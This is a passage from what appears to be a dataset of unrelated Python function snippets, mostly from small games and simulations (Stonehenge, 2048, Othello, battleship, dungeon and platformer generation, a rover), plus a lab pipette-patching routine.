key[1][index] = '2'\n change_dict = {}\n for item in new_ley_lines:\n for key in item:\n p1_count = 0\n p2_count = 0\n for string in key[1]:\n if string == '1':\n p1_count += 1\n if string == '2':\n p2_count += 1\n\n\n if p1_count >= len(key[1])/2 and p1_count > p2_count:\n\n change_dict[key[0]] = '1'\n if p2_count >= len(key[1])/2 and p2_count > p1_count:\n\n change_dict[key[0]] = '2'\n for key in change_dict:\n if not (key == '1' or key == '2'):\n if str(key) in new_board:\n new_board = new_board.replace(str(key), change_dict[key])\n for item in new_ley_lines:\n for key1 in item:\n if key == key1[0]:\n key1[0] = change_dict[key]\n\n new_state = StonehengeState(not self.p1_turn, self.side_length,\n new_board, new_ley_lines)\n return new_state", "def make_move(self, move: Any) -> 'StonehengeState':\n if type(move) == str:\n new_state = StonehengeState(not self.p1_turn, self.side_length)\n # copy the board information from current state\n # make copy of current state information\n hori_lst_copy = []\n for lst in self.hori_lst:\n temp = []\n for item in lst:\n temp.append(item)\n hori_lst_copy.append(temp)\n left_lst_copy = []\n for lst in self.left_lst:\n temp = []\n for item in lst:\n temp.append(item)\n left_lst_copy.append(temp)\n right_lst_copy = []\n for lst in self.right_lst:\n temp = []\n for item in lst:\n temp.append(item)\n right_lst_copy.append(temp)\n\n hori_result_copy = []\n for item in self.hori_result:\n hori_result_copy.append(item)\n left_result_copy = []\n for item in self.left_result:\n left_result_copy.append(item)\n right_result_copy = []\n for item in self.right_result:\n right_result_copy.append(item)\n\n new_state.hori_lst = hori_lst_copy\n new_state.hori_result = hori_result_copy\n new_state.left_lst = left_lst_copy\n new_state.left_result = left_result_copy\n new_state.right_lst = right_lst_copy\n new_state.right_result = right_result_copy\n # update the new state with str move\n # parallel nested list data structure\n lst = [new_state.hori_lst, new_state.left_lst, new_state.right_lst]\n result = [new_state.hori_result, new_state.left_result, new_state.right_result]\n # update the cell\n for i in range(len(lst)):\n for j in range(len(lst[i])):\n for k in range(len(lst[i][j])):\n if lst[i][j][k] == move:\n # should use the player name of last state, so opposite names\n if new_state.p1_turn:\n lst[i][j][k] = \"2\"\n else:\n lst[i][j][k] = \"1\"\n # update ley-line marks\n # the ley-line may belong to a player after this move\n p1_taken = 0\n p2_taken = 0\n if result[i][j] != \"@\":\n continue\n for item in lst[i][j]:\n if item == \"1\":\n p1_taken += 1\n if item == \"2\":\n p2_taken += 1\n if float(p1_taken) >= len(lst[i][j]) / 2:\n result[i][j] = \"1\"\n if float(p2_taken) >= len(lst[i][j]) / 2:\n result[i][j] = \"2\"\n ###### CHECK FOR SHALLOW COPY PROBLEM, IF ATTRIBUTE IS UPDATE IN NEW STATE\n return new_state", "def move(self):\n # This block is used to move into the living room.\n if self.room_name == \"living\" or self.room_name == \"Living\":\n self.living_room()\n # This block is used to open the door.\n elif self.room_name == \"Door\" or self.room_name == \"door\":\n self.door()\n # This block is used to move into the kitchen.\n elif self.room_name == \"Kitchen\" or self.room_name == \"kitchen\":\n self.kitchen()\n # This block is used to move into the hallway.\n elif self.room_name == \"Hallway\" or self.room_name == \"hallway\":\n self.hallway()\n # This block is used to move into the bathroom.\n elif self.room_name == \"Bathroom\" or self.room_name == \"bathroom\":\n self.bathroom()\n # This block is used to move into the basement.\n elif self.room_name == \"Basement\" or self.room_name == \"basement\":\n self.basement()\n # This block is used to move into the bedroom.\n elif self.room_name == \"Bedroom\" or self.room_name == \"bedroom\":\n self.bedroom()\n # This block is used to move into the attic.\n elif self.room_name == \"Attic\" or \"attic\":\n self.attic()", "def grow_fungi(self, wall):\n if self.direction == 1:\n ledge_fungus = FirstLedge(self.rect.centery, self.room, wall, 'right')\n self.room.can_climb.add(ledge_fungus)\n else:\n ledge_fungus = FirstLedge(self.rect.centery, self.room, wall, 'left')\n self.room.can_climb.add(ledge_fungus)", "def new_tile(self):\n while True:\n random_row = random.randrange(self._grid_height)\n random_column = random.randrange(self._grid_width)\n if self._grid[random_row][random_column] == 0:\n self._grid[random_row][random_column] = random.choice([2] * 9 + [4])\n break", "def make_move(self, request):\n\n player = Player.query(Player.name == request.player_name).get()\n\n \"\"\"we validate that the player is in the Data Base\"\"\"\n if not player:\n raise endpoints.NotFoundException('player not found')\n\n game = gameutils.get_by_urlsafe(request.urlsafe_key, Game)\n \"\"\"we validate that the game where we want to create the board exists\"\"\"\n if not game:\n raise endpoints.NotFoundException(\n 'Game not found in the DB, please start a new game')\n\n board = Board.query(Board.key == player.board).get()\n \"\"\"we validate that the board where we want to create the board exists\"\"\"\n if not board:\n raise endpoints.NotFoundException('board not found')\n\n \"\"\"we validate that the board of the player is active, the player can't create\n multiple boards for the same Game\"\"\"\n if not player.board and not player.board_active:\n raise endpoints.ConflictException(\n 'This player has already an empty board have already a board')\n\n if player.board != board.key:\n raise endpoints.ConflictException('the board for this player is not the proper')\n\n if not gameutils.valid_target_pointed(request.x_position, request.y_position):\n raise endpoints.ConflictException('the targeted position is not ok')\n\n\n try:\n result = gameutils.search_in_board(board, request.x_position, request.y_position)\n\n if result == \"error\":\n raise endpoints.ConflictException('there is a problem with the BOARD')\n else:\n score = Score.query(Score.player_name == player.name, Score.board == board, Score.game == game)\n board.add_target(request.x_position, request.y_position)\n game.add_move_to_history(request.x_position, request.y_position, player.name)\n message = score.target_hitted(player,request.x_position, request.y_position, board, game)\n if score.check_if_win():\n message = \"You sunk the last Boat, you win!!!\"\n board.deactivate()\n return StringMessage(message=message)\n\n except ValueError:\n raise endpoints.BadRequestException('please verify the information ')", "def __init__(self, _pendown=1, gridmode=False, gridsize=50, homeX = 50 + 25 + 5, homeY = 50 + 25 + 5, canvWidth = 400, canvHeight = 200, \\\n turtleMainColor=\"#00A651\", turtleAccentColor=\"#FFF600\", speed = 5, rotspeed = 5, pencolor = 'red', penwidth=3):\n self._turtleMainColor = turtleMainColor\n self._turtleAccentColor = turtleAccentColor\n self._speed = speed\n self._rotspeed = rotspeed\n self._pendown = _pendown\n self._pencolor = pencolor\n self._penwidth = penwidth\n self._rotation = 90\n self._gridsize = gridsize\n self._gridmode = gridmode\n \n if(gridmode and homeX == 80):\n homeX = 0\n homeY = 0\n \n self._x = homeX\n self._y = homeY\n self._homeX = homeX\n self._homeY = homeY\n \n self._canvWidth = canvWidth\n self._canvHeight = canvHeight\n self._actions = []\n self._levelDataString = [] \n \n self._walls = []\n self._lava = []\n \n self._appendCurrentState();", "def regenerate(self, random_state):\n # Resize the entire corridor first.\n super(GapsCorridor, self).regenerate(random_state)\n\n # Move the ground plane down and make it invisible.\n self._ground_plane.pos = [self._current_corridor_length / 2, 0, -10]\n self._ground_plane.rgba = [0, 0, 0, 0]\n\n # Clear the existing platform pieces.\n self._ground_body.geom.clear()\n\n # Make the first platform larger.\n platform_length = 3. * _CORRIDOR_X_PADDING\n platform_pos = [\n platform_length / 2,\n 0,\n -_WALL_THICKNESS,\n ]\n platform_size = [\n platform_length / 2,\n self._current_corridor_width / 2,\n _WALL_THICKNESS,\n ]\n if self._aesthetic != 'default':\n self._ground_body.add(\n 'geom',\n type='box',\n name='start_floor',\n pos=platform_pos,\n size=platform_size,\n material=self._ground_material)\n else:\n self._ground_body.add(\n 'geom',\n type='box',\n rgba=variation.evaluate(self._ground_rgba, random_state),\n name='start_floor',\n pos=platform_pos,\n size=platform_size)\n\n current_x = platform_length\n platform_id = 0\n while current_x < self._current_corridor_length:\n platform_length = variation.evaluate(\n self._platform_length, random_state=random_state)\n platform_pos = [\n current_x + platform_length / 2.,\n 0,\n -_WALL_THICKNESS,\n ]\n platform_size = [\n platform_length / 2,\n self._current_corridor_width / 2,\n _WALL_THICKNESS,\n ]\n if self._aesthetic != 'default':\n self._ground_body.add(\n 'geom',\n type='box',\n name='floor_{}'.format(platform_id),\n pos=platform_pos,\n size=platform_size,\n material=self._ground_material)\n else:\n self._ground_body.add(\n 'geom',\n type='box',\n rgba=variation.evaluate(self._ground_rgba, random_state),\n name='floor_{}'.format(platform_id),\n pos=platform_pos,\n size=platform_size)\n\n platform_id += 1\n\n # Move x to start of the next platform.\n current_x += platform_length + variation.evaluate(\n self._gap_length, random_state=random_state)", "def move(self, direction, cycles):\n\t\tself.planet.tiles[self.y][self.x].set_occupant() # set occupant to the initial tile\n\t\tif direction == \"N\": # unit vector (0, -1)\n\t\t\ty_symbol = -1\n\t\t\tx_symbol = 0\n\t\tif direction == \"S\": # unit vector (0, 1)\n\t\t\ty_symbol = 1\n\t\t\tx_symbol = 0\n\t\tif direction == \"W\": # unit vector (-1, 0)\n\t\t\tx_symbol = -1\n\t\t\ty_symbol = 0\n\t\tif direction == \"E\": # unit vector (1, 0)\n\t\t\tx_symbol = 1\n\t\t\ty_symbol = 0\n\t\ti = 0\n\t\twhile i < int(cycles):\n\t\t\tnext_x = self.x + x_symbol # change x coordinate\n\t\t\tnext_y = self.y + y_symbol # change y coordinate\n\t\t\tnext_x, next_y = self.spherical(next_x, next_y) # get the next tile's coordinate\n\t\t\tif self.can_move(next_x, next_y): # check whether rover can move\n\t\t\t\t#reduce battery\n\t\t\t\tif self.planet.tiles[next_y][next_x].is_shaded():\n\t\t\t\t\tself.battery -= 1\n\t\t\t\tself.x = next_x\n\t\t\t\tself.y = next_y\n\t\t\t\ttile = self.planet.tiles[next_y][next_x]\n\t\t\t\ttile.set_occupant()\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tbreak", "def patch(self, position):\n # Get the corresponding position in the pipette referential\n tip_position = self.inv_mat * position\n\n # Approaching cell 1um by 1um\n self.update_message('Approaching cell...')\n while self.withdraw_sign * (self.arm.position(0) - tip_position[0, 0]) + 3 > 0:\n # Arm is not beyond the desired position, moving\n self.arm.step_move(-self.withdraw_sign, 0)\n self.arm.wait_motor_stop([0])\n time.sleep(1)\n if self.pipette_resistance * 1.15 < self.get_resistance():\n # pipette resistance has increased: probably close to cell, wait for stablilization\n time.sleep(10)\n if self.pipette_resistance * 1.15 < self.get_resistance():\n # Resistance has not decreased, stop moving\n # Close to the cell, sealing\n self.update_message('Cell found. Sealing...')\n self.pressure.seal()\n init_time = time.time()\n self.amplifier.set_holding_enable(True)\n while (1e9 > self.get_resistance()) | (time.time() - init_time < 15):\n # Waiting for measure to increased to 1GOhm\n if time.time() - init_time < 10:\n # decrease holding to -70mV in 10 seconds\n self.amplifier.set_holding(-7 * 1e-3 * (time.time() - init_time))\n self.amplifier.set_holding_enable(True)\n if time.time() - init_time >= 90:\n # Resistance did not increased enough in 90sec: failure\n self.update_message('ERROR: Seal unsuccessful.')\n return 0\n # Seal succesfull\n self.pressure.release()\n self.update_message('Seal done.')\n return 1\n\n # Broke the loop because arm went too far without finding the cell\n self.update_message('ERROR: Could not find the cell.')\n return 0", "def __init__(self, num_rows = 4, num_cols = 4,\n first_mover = \"W\", top_left = \"B\",\n how_to_win = \">\", initial_config=[]):\n # initial_config was made for AI Othello to\n # get around pass-by-reference behavior of lists.\n if (4 > num_rows > 16) or num_rows % 2 != 0:\n raise Exception\n else:\n self._num_rows = num_rows\n if (4 > num_cols > 16) or num_cols % 2 != 0:\n raise Exception\n else:\n self._num_cols = num_cols\n if first_mover != \"B\" and first_mover != \"W\":\n raise Exception\n else:\n self._turn = first_mover\n if top_left != \"B\" and top_left != \"W\":\n raise Exception\n else:\n self._top_left = top_left\n if how_to_win != \">\" and how_to_win != \"<\":\n raise Exception\n else:\n self._how_to_win = how_to_win\n\n if initial_config == []:\n self._board = self._make_board(num_rows, num_cols, top_left)\n else:\n self._board = deepcopy(initial_config)\n \n self._game_over = False\n self._winner = \" \"\n self._tl_cell = (0, 0)\n self._tr_cell = (0, num_cols-1)\n self._bl_cell = (num_rows-1, 0)\n self._br_cell = (num_rows-1, num_cols-1)\n self._ls_cells = [(c, 0) for c in range(1, num_rows-1)]\n self._rs_cells = [(c, num_cols-1) for c in range(1, num_rows-1)]\n self._ts_cells = [(0, c) for c in range(1, num_cols-1)]\n self._bs_cells = [(num_rows-1, c) for c in range(1, num_cols-1)]\n #^Note how ranges start from 1 and go to num_rows-1 to avoid corners,\n #which are processed differently", "def regenerate(self, random_state):\n super(WallsCorridor, self).regenerate(random_state)\n wall_x = variation.evaluate(\n self._wall_gap, random_state=random_state) - _CORRIDOR_X_PADDING\n wall_side = 0\n wall_id = 0\n while wall_x < self._current_corridor_length:\n wall_width = variation.evaluate(\n self._wall_width, random_state=random_state)\n wall_height = variation.evaluate(\n self._wall_height, random_state=random_state)\n wall_rgba = variation.evaluate(self._wall_rgba, random_state=random_state)\n if variation.evaluate(self._swap_wall_side, random_state=random_state):\n wall_side = 1 - wall_side\n\n wall_pos = [\n wall_x,\n (2 * wall_side - 1) * (self._current_corridor_width - wall_width) / 2,\n wall_height / 2\n ]\n wall_size = [_WALL_THICKNESS / 2, wall_width / 2, wall_height / 2]\n self._walls_body.add(\n 'geom',\n type='box',\n name='wall_{}'.format(wall_id),\n pos=wall_pos,\n size=wall_size,\n rgba=wall_rgba)\n\n wall_id += 1\n wall_x += variation.evaluate(self._wall_gap, random_state=random_state)", "def computer_move(self):\n tree = LinkedBinaryTree(self)\n self.create_tree(tree)\n left_points = self._calculate_points(tree.get_left_child())\n right_points = self._calculate_points(tree.get_right_child())\n\n if left_points < right_points:\n next_board = tree.get_right_child().key\n else:\n next_board = tree.get_left_child().key\n self.board = next_board.board", "def calculate_random_move(self, vehicleamount, visit):\n self.depth += 1\n\n while True:\n number = (randint(0, 1))\n vehicle_id = (randint(0, vehicleamount-1))\n vehicle = self.vehicles[vehicle_id]\n state = self.get_board()\n if vehicle.orientation == 0: #horizontal\n if number == 0:\n if vehicle.x > 0: #left\n if state[vehicle.y][vehicle.x-1] == \"..\":\n self.vehicles[vehicle_id].x -=1\n if self.get_board().tostring() in visit:\n self.vehicles[vehicle_id].x += 1\n else:\n return self\n else:\n if vehicle.x + vehicle.length <= (len(state)-1): #right\n if state[vehicle.y][vehicle.x+vehicle.length] == \"..\":\n self.vehicles[vehicle_id].x += 1\n if self.get_board().tostring() in visit:\n self.vehicles[vehicle_id].x -= 1\n else:\n return self\n else: #vertical\n if number == 0:\n if vehicle.y - 1 >= 0: #up\n if state[vehicle.y-1][vehicle.x] == \"..\":\n self.vehicles[vehicle_id].y -= 1\n if self.get_board().tostring() in visit:\n self.vehicles[vehicle_id].y += 1\n else:\n return self\n else:\n if vehicle.y + vehicle.length <= (len(state)-1):\n if state[vehicle.y + vehicle.length][vehicle.x] == \"..\":#down\n self.vehicles[vehicle_id].y += 1\n if self.get_board().tostring() in visit:\n self.vehicles[vehicle_id].y -= 1\n else:\n return self", "def generate(self, level):\n # TODO The dungeon's instances are spawned and loaded here.\n # fill map with \"blocked\" tiles\n level.maze = [[Tile(x, y, True) for y in range(level.height)] for x in range(level.width)]\n\n for r in range(level.max_rooms):\n # random width and height\n w = random.randint(level.min_room_size, level.max_room_size)\n h = random.randint(level.min_room_size, level.max_room_size)\n\n # random position without going out of the boundaries of the map\n x = random.randint(0, level.width - w - 1)\n y = random.randint(0, level.height - h - 1)\n\n # \"DungeonRoom\" class makes rectangles easier to work with\n new_room = Room(x, y, w, h)\n level.rooms.append(new_room)\n\n # run through the other rooms and see if they intersect with this one\n failed = False\n for other_room in level.rooms:\n if other_room is not new_room and new_room.intersect(other_room):\n failed = True\n break\n\n if not failed:\n # this means there are no intersections, so this room is valid\n\n # \"paint\" it to the map's tiles\n self._create_room(level, new_room)\n\n # center coordinates of new room, will be useful later\n new_x, new_y = new_room.center()\n\n if level.num_rooms > 0:\n # connect it to the previous room with a tunnel\n # center coordinates of previous room\n (prev_x, prev_y) = level.rooms[level.num_rooms - 1].center()\n\n # draw a coin (random number that is either 0 or 1)\n if random.randint(0, 1) == 1:\n # first move horizontally, then vertically\n self._create_h_tunnel(level, prev_x, new_x, prev_y)\n self._create_v_tunnel(level, prev_y, new_y, new_x)\n else:\n # first move vertically, then horizontally\n self._create_v_tunnel(level, prev_y, new_y, prev_x)\n self._create_h_tunnel(level, prev_x, new_x, new_y)\n\n # finally, append the new room to the list\n level.rooms.append(new_room)\n level.num_rooms += 1\n\n # connect them with a tunnel\n self._create_h_tunnel(level, 25, 55, 23)", "def cell_move_herbivores(self, coordinate):\n \"\"\"Moves the herbivores that should move in given cell\"\"\"\n\n right = (coordinate[0], coordinate[1] + 1)\n up = (coordinate[0] - 1, coordinate[1])\n left = (coordinate[0], coordinate[1] - 1)\n down = (coordinate[0] + 1, coordinate[1])\n\n length = len(self.cells[coordinate].herbivores)\n for _ in range(length):\n herbivore = self.cells[coordinate].herbivores.pop(0)\n\n if herbivore.migration():\n move_direction = self.get_direction(\n self.get_pi_values_herbivores(coordinate))\n if move_direction == 'right':\n self.cells[right].herbivores_new.append(herbivore)\n elif move_direction == 'up':\n self.cells[up].herbivores_new.append(herbivore)\n elif move_direction == 'left':\n self.cells[left].herbivores_new.append(herbivore)\n elif move_direction == 'down':\n self.cells[down].herbivores_new.append(herbivore)\n else:\n self.cells[coordinate].herbivores.append(herbivore)\n else:\n self.cells[coordinate].herbivores.append(herbivore)", "def update_grid(self):\n if self.game_over:\n return\n if self.active_piece is None:\n self.place_new_piece()\n if self.piece_collision_exists(self.active_piece):\n self.handle_active_piece_collision()\n self.place_new_piece()\n self.shift_cells(self.active_piece, self.current_direction)\n self.active_piece = TransformPiece.shift_coordinates(self.active_piece, self.current_direction)\n self.merge_with_completed_rows()\n if self.is_game_won():\n self.game_over = True", "def advance_board(self):\n # We can advance the board using a pretty simple convolution,\n # so we don't have to execute a lot of loops in python.\n # Of course, this probably won't be sufficient for extremely\n # large boards.\n self.num_steps += 1\n board = self.board\n cfilter = np.array([[1,1,1],[1,0,1],[1,1,1]], dtype=np.uint16)\n\n alive = board & CellTypes.alive > 0\n spawning = board & CellTypes.spawning > 0\n frozen = board & CellTypes.frozen > 0\n\n can_die = ~frozen & (\n convolve2d(board & CellTypes.preserving, cfilter) == 0)\n can_grow = ~frozen & (\n convolve2d(board & CellTypes.inhibiting, cfilter) == 0)\n\n num_neighbors = convolve2d(alive, cfilter)\n num_spawn = convolve2d(spawning, cfilter)\n spawn_prob = 1 - (1 - self.spawn_prob)**num_spawn\n has_spawned = coinflip(spawn_prob, board.shape)\n\n born_rule = np.zeros(9, dtype=bool)\n born_rule[list(self.born_rule)] = True\n dead_rule = np.ones(9, dtype=bool)\n dead_rule[list(self.survive_rule)] = False\n\n new_alive = (born_rule[num_neighbors] | has_spawned) & ~alive & can_grow\n new_dead = dead_rule[num_neighbors] & alive & can_die\n\n new_flags = np.zeros_like(board)\n color_weights = 1 * alive + 2 * spawning\n for color in CellTypes.colors:\n # For each of the colors, see if there are two or more neighbors\n # that have it. If so, any new cells (whether born or spawned)\n # will also get that color.\n has_color = board & color > 0\n new_color = convolve2d(has_color * color_weights, cfilter) >= 2\n new_flags += color * new_color\n indestructible = alive & (board & CellTypes.destructible == 0)\n new_flags += CellTypes.destructible * (convolve2d(indestructible, cfilter) < 2)\n\n board *= ~(new_alive | new_dead)\n board += new_alive * (CellTypes.alive + new_flags)", "def _check_ls_corners(self, i_row, i_col, adj_opp_cells, loc):\n shift = 1 if loc == \"tl\" else -1 #either top-left or bottom-left\n opp_player = \"B\" if self._turn == \"W\" else \"W\"\n\n #Note that loc corresponds to the position of the tile to be placed.\n #Also, the indices correspond to an adjacent opposing cell to be considered.\n #The compass direction corresponds to the direction in which the adjacent opposing\n #cell will be \"entered\" by the tile to be placed.\n if self._board[i_row+shift][i_col] == opp_player: #up/down\n if loc == \"tl\":\n adj_opp_cells.append((i_row+shift, i_col, \"n\"))\n elif loc == \"bl\":\n adj_opp_cells.append((i_row+shift, i_col, \"s\")) \n if self._board[i_row+shift][i_col+1] == opp_player: #down-diag/up-diag\n if loc == \"tl\":\n adj_opp_cells.append((i_row+shift, i_col+1, \"nw\")) \n elif loc == \"bl\":\n adj_opp_cells.append((i_row+shift, i_col+1, \"sw\")) \n if self._board[i_row][i_col+1] == opp_player: #right\n adj_opp_cells.append((i_row, i_col+1, \"w\"))", "def move_girl2(girl):\n global trainer_speed, girlcount2, girl_left2\n if girl_left2:\n for i in girl:\n i.x -= trainer_speed\n i.move_speed()\n girlcount2 += 0.5\n girl_frame = int(girlcount2) % 3\n camera.draw(girl[girl_frame])\n else:\n for i in girl:\n i.x += trainer_speed\n i.move_speed()\n girlcount2 += 0.5\n girl_frame = int(girlcount2) % 3\n camera.draw(girl[girl_frame + 3])\n for each in girl:\n if each.x < 20:\n girl_left2 = False\n if each.x > 780:\n girl_left2 = True", "def move(self, direction):\n new_grid = []\n # get the indices of specific direction\n new_indices = self._grid_indices[direction]\n for cell in new_indices:\n lst = self.traversed_list(cell, direction)\n merged_list = merge(lst)\n new_grid.append(merged_list)\n \n adjusted_grid = adjust_grid(new_grid,direction)\n if self.is_changed(adjusted_grid):\n self.update_grid(adjusted_grid)\n self.new_tile()", "def make_random_move(self):\n #raise NotImplementedError\n # Take out moves_made as well as mines detected\n self.available_cells = self.available_cells - self.moves_made - self.mines\n available_cells = self.available_cells.copy()\n\n # I'll first try and see if there's any move not within the nearby of\n # The mines, I think this can maximise survivability in some cases\n # It'll still work even if didn't do the below\n for sentence in self.knowledge:\n available_cells -= sentence.cells\n #print(sentence)\n #print(self.mines)\n\n # Making a random move\n length = len(available_cells)\n if length != 0:\n index = random.randint(0, length - 1)\n move = list(available_cells)[index]\n self.moves_made.add(move)\n self.mark_safe(move)\n return move\n\n length = len(self.available_cells)\n if length != 0:\n index = random.randint(0, length - 1)\n move = list(self.available_cells)[index]\n self.moves_made.add(move)\n self.mark_safe(move)\n return move\n return None", "def add_spawns_outside_boss_doors(self: WWRandomizer):\n \n rooms_to_add_new_spawns_to = [\n (\"M_NewD2\", 10, TGDR, None, 11),\n #(\"kindan\", 16, TGDR, None, 13), # Already has a spawn, ID 1.\n (\"Siren\", 18, TGDR, None, 13),\n (\"sea\", 1, ACTR, 1, 56),\n (\"M_Dai\", 15, TGDR, None, 17),\n (\"kaze\", 12, TGDR, None, 13),\n ]\n \n for stage_name, room_number, chunk, layer, boss_door_index in rooms_to_add_new_spawns_to:\n new_spawn_id = 27\n \n dzs = self.get_arc(\"files/res/Stage/%s/Stage.arc\" % stage_name).get_file(\"stage.dzs\", DZx)\n dzr = self.get_arc(\"files/res/Stage/%s/Room%d.arc\" % (stage_name, room_number)).get_file(\"room.dzr\", DZx)\n \n if chunk == TGDR:\n dzx_for_door = dzs\n else:\n dzx_for_door = dzr\n \n door = dzx_for_door.entries_by_type_and_layer(chunk, layer=layer)[boss_door_index]\n spawn_dist_from_door = 200\n y_rot = door.y_rot\n if door.from_room_num != room_number and door.from_room_num != 63:\n y_rot = (y_rot + 0x8000) % 0x10000\n y_rot_degrees = y_rot * (90.0 / 0x4000)\n x_offset = math.sin(math.radians(y_rot_degrees)) * spawn_dist_from_door\n z_offset = math.cos(math.radians(y_rot_degrees)) * spawn_dist_from_door\n x_pos = door.x_pos + x_offset\n y_pos = door.y_pos\n z_pos = door.z_pos + z_offset\n \n if stage_name in [\"M_Dai\", \"kaze\"]:\n # Earth and Wind temple spawns must be in the stage instead of the room or the game will crash.\n dzx_for_spawn = dzs\n else:\n dzx_for_spawn = dzr\n \n spawns = dzx_for_spawn.entries_by_type(PLYR)\n assert len([spawn for spawn in spawns if spawn.spawn_id == new_spawn_id]) == 0\n \n new_spawn = dzx_for_spawn.add_entity(PLYR)\n new_spawn.spawn_type = 0\n new_spawn.room_num = room_number\n new_spawn.x_pos = x_pos\n new_spawn.y_pos = y_pos\n new_spawn.z_pos = z_pos\n new_spawn.y_rot = y_rot\n new_spawn.spawn_id = new_spawn_id\n \n dzx_for_spawn.save_changes()", "def make_move(self, x, y):\n player = self.get_player()\n self.__grid[y][x] = player\n\n winner, win_tiles = self.check_move(self.get_player(), x, y)\n\n self.__turns_played += 1\n\n # Check if winner has been found\n if player == winner:\n loser = MarkerType(1 - winner.value)\n self.__winner = winner\n self.__loser = loser\n self.__state = GameState.WINNER\n return GameState.WINNER, winner, loser, win_tiles\n\n # Check if board is full and tie happens\n elif self.__turns_played >= Settings.SIZE_X * Settings.SIZE_Y:\n self.__state = GameState.TIE\n return GameState.TIE, MarkerType.NONE, MarkerType.NONE, []\n\n self.__turn += 1\n return GameState.PLAYING, MarkerType.NONE, MarkerType.NONE, []", "def move(self, direction):\r\n # replace with your code\r\n row_dir = OFFSETS[direction][0]\r\n col_dir = OFFSETS[direction][1]\r\n \r\n if row_dir == 0:\r\n new_cells = self._cells\r\n new_dir = col_dir\r\n else:\r\n new_tuples = zip(*self._cells)\r\n new_cells = [list(item) for item in new_tuples]\r\n new_dir = row_dir\r\n \r\n tmp_cells = []\r\n for lists in new_cells:\r\n lists = lists[::new_dir]\r\n merge_lists = merge(lists)\r\n tmp_cells.append(merge_lists[::new_dir])\r\n \r\n if row_dir == 0:\r\n self._cells = tmp_cells\r\n else:\r\n new_tuples = zip(*tmp_cells)\r\n new_cells = [list(item) for item in new_tuples]\r\n self._cells = new_cells\r\n \r\n self.new_tile()", "def create_room(self):\n # iterate through array of room types\n rooms = []\n prob_block_5_list = []\n prob_block_6_list = []\n\n for row in self.room_type:\n for col in row:\n rooms.append(self.import_template(col))\n # iterate through rooms to fill screen\n # this number will be part of how we find location of top left corner of room\n # based on 5x5 grid of rooms\n for pos in range(25):\n # this will iterate through the number of columns in array\n # the number y will be part of how we find where to place the block on the y axis (according to pygame.draw)\n for y in range(self.blocks_per_room_y):\n # this will iterate through the number of rows in array\n # the number x will be part of how we find where to place the block on the x axis (according to pygame.draw)\n for x in range(self.blocks_per_room_x):\n # if cell is a 1 add a platform sprite\n if rooms[pos][y][x] is 1:\n #check if platform has another above it for graphics\n if rooms[pos][y - 1][x] in (0, 3, 4, 7) and y - 1 >= 0:\n # the cases checked in each of these conditionals are the basic case that check surrounding blocks\n # to see what platform we should be using, the edge cases, such as if a block is at the edge of\n # the room, in which case we need to check the neighboring room (array in this case)\n\n #check conditions to see if we are using the sprite with with rounded edges on the bottom right and top right\n if ((y + 1) < self.blocks_per_room_y and (x - 1) >= 0 and (x + 1) < self.blocks_per_room_x\n and rooms[pos][y + 1][x] is 0 and rooms[pos][y][x + 1] is 0 and rooms[pos][y][x - 1] is 1)\\\n or (x is self.blocks_per_room_x - 1 and y < self.blocks_per_room_y - 1 and pos < 24 and rooms[pos][y + 1][x] is 0 and rooms[pos + 1][y][0] is 0)\\\n or (y is self.blocks_per_room_y - 1 and x < self.blocks_per_room_x - 1 and pos < 20 and rooms[pos][y][x + 1] is 0):\n block = Platform(self.block_width, self.block_height, 'right', self.theme)\n #check conditionals to see if we are using the sprite with rounded edges on the bottom left and top left\n elif ((y + 1) < self.blocks_per_room_y and (x - 1) >= 0 and (x + 1) < self.blocks_per_room_x\n and rooms[pos][y + 1][x] is 0 and rooms[pos][y][x - 1] is 0 and rooms[pos][y][x + 1] is 1)\\\n or (x is 0 and y < self.blocks_per_room_y - 1 and pos > 0 and rooms[pos][y + 1][x] is 0 and rooms[pos - 1][y][self.blocks_per_room_x - 1] is 0) \\\n or (y is self.blocks_per_room_y - 1 and x > 0 and pos < 20 and rooms[pos][y][x - 1] is 0):\n block = Platform(self.block_width, self.block_height, 'left', self.theme)\n #check conditionals to see if we are using the sprite with the rounded corners on top left and top right\n elif ((x + 1) < self.blocks_per_room_x and (x - 1) >= 0 and rooms[pos][y][x + 1] in (0, 3, 4) and rooms[pos][y][x - 1] in (0, 3, 4))\\\n or (x is 0 and pos > 0 and rooms[pos - 1][y][self.blocks_per_room_x - 1] in (0, 3, 4) and rooms[pos][y][x + 1] in (0, 3, 4))\\\n or (x is self.blocks_per_room_x - 1 and pos < 24 and rooms[pos + 1][y][0] in (0, 3, 4) and rooms[pos][y][x - 1] in (0, 3, 4)):\n block = Platform(self.block_width, self.block_height, 'round top', self.theme)\n #check conditionals to see if we are using the sprite with the rounded corner in the top left\n elif ((y + 1) < self.blocks_per_room_y and (x - 1) >= 0 and (x + 1) < self.blocks_per_room_x\n and rooms[pos][y + 1][x] is 1 and rooms[pos][y][x - 1] is 0 and rooms[pos][y][x + 1] is 1) \\\n or (x is 0 and y < self.blocks_per_room_y - 1 and pos > 0 and rooms[pos][y + 1][x] is 1 and rooms[pos - 1][y][self.blocks_per_room_x - 1] is 0) \\\n or (y is self.blocks_per_room_y - 1 and x > 0 and pos < 20 and rooms[pos][y][x - 1] is 0):\n block = Platform(self.block_width, self.block_height, 'top left', self.theme)\n #check conditionals to see if we are using the sprite with the rounded corner in the top right\n elif ((y + 1) < self.blocks_per_room_y and (x - 1) >= 0 and (x + 1) < self.blocks_per_room_x\n and rooms[pos][y + 1][x] is 1 and rooms[pos][y][x + 1] is 0 and rooms[pos][y][x - 1] is 1)\\\n or (x is self.blocks_per_room_x - 1 and y < self.blocks_per_room_y - 1 and pos < 24 and rooms[pos][y + 1][x] is 0 and rooms[pos + 1][y][0] is 0)\\\n or (y is self.blocks_per_room_y - 1 and x < self.blocks_per_room_x - 1 and pos < 20 and rooms[pos][y][x + 1] is 0):\n block = Platform(self.block_width, self.block_height, 'top right', self.theme)\n else:\n block = Platform(self.block_width, self.block_height, 'top', self.theme)\n else:\n block = Platform(self.block_width, self.block_height, 'middle', self.theme)\n coord_x = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n block.rect.x = coord_x\n block.rect.y = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n block.player = self.player\n self.platform_list.add(block)\n #if the space above this block is empty see if we spawn an enemy on the spot above current block\n if rooms[pos][y-1][x] is 0 and y - 1 >= 0:\n self.enemy_generation(coord_x, self.block_height + (pos // 5) * self.room_side_length_y + (y - 1) * self.block_height)\n # if the cell is a 3 then it will be an item pickup\n elif rooms[pos][y][x] is 3:\n rand = random.randrange(0, 4)\n if rand == 0:\n 